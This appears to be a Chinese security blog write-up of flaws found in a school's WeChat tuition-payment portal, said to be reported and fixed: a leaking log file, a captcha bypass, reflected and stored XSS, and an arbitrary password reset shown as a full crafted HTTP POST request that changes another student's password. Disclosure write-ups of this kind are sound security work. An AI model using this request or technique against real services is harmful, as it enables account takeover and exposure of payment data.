0X01前言

这学期开学交学费的时候,学校开了一个公众号让我们去缴费,随手测试已提交并修复,水文一篇记录一下

0x02信息泄露

一些支付的订单和数据库的信息

xxxxxxxxx.com/wx/log/log.log

74794-g1grruhgvm.png

0x03任意密码重置

通过忘记密码的页面

xxxxxxxx.com/toForgetSscret

查看源代码可以看到重置密码的数据包构造

06078-0zu0lltttkfh.png

构造数据包,来重置20xxxxxxxxxx的密码

POST /updateP HTTP/1.1
Host: xxxxxxxx.com
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"newp":"xX123456","yhbh":"20xxxxxxxxxx"}

发包成功重置
11589-gd6jo7m077b.png

0x04验证码绕过

虽然不痛不痒但是提一嘴,前端校验数据包内没有验证码字段,默认密码000000,或者重置密码后可以用随机openid来绑定这些账号让他们原主人绑定不上去也算危害

42392-j920e9ksnzm.png

0x05反射xss

在登入页面的显示头像的参数上过滤不严导出xss

17791-7rkqv5sav6a.png

0x06存储xss

通过存在反射xss的链接去绑定他会存储头像,绑定成功后来到首页就弹窗转换为存储xss

49172-b1fntqa1k2r.png

查看源代码

83071-gpz8vf1f8fg.png

Last modification:April 23, 2022
  • 本文作者:Juneha
  • 本文链接:https://blog.mo60.cn/index.php/archives/276.html
  • 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
  • 法律说明:
  • 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全,本文内容未隐讳任何个人、群体、公司。非文学作品,请勿过度理解,根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途。
如果觉得我的文章对你有用,请随意赞赏,可备注留下ID方便感谢